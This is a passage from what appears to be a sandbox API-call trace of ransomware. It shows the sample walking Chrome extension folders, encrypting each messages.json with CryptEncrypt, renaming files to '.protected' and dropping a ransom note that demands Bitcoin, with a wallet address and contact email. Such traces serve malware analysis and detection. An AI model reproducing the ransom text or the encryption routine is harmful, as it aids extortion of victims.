lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.508] CloseHandle (hObject=0x164) returned 1 [0083.508] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0083.508] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned 150 [0083.508] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0083.508] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0083.508] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*") returned 152 [0083.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.508] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.508] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\.") returned 152 [0083.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.509] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\..") returned 153 [0083.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.509] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.509] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.509] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.509] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.509] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.510] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.510] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.510] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.510] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.524] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.524] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.524] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.524] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.558] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.558] CloseHandle (hObject=0x168) returned 1 [0083.558] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.protected") returned 174 [0083.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.protected")) returned 1 [0083.559] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.559] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.559] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\RESTORE_FILES.txt") returned 168 [0083.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.560] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.560] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.561] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.561] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.561] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.561] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.561] CloseHandle (hObject=0x164) returned 1 [0083.561] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0083.561] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned 151 [0083.561] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0083.561] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0083.561] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*") returned 153 [0083.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.562] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.562] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.562] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.562] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.562] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\.") returned 153 [0083.562] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.562] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.562] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.562] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.562] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.562] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\..") returned 154 [0083.562] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.562] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.562] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.562] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.562] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.566] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.566] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.566] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.566] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.566] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.566] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.566] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.568] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.568] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.568] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.568] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.569] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.569] CloseHandle (hObject=0x168) returned 1 [0083.569] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.protected") returned 175 [0083.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.protected")) returned 1 [0083.570] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.570] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\RESTORE_FILES.txt") returned 169 [0083.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.571] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.571] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.571] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.571] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.572] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.572] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 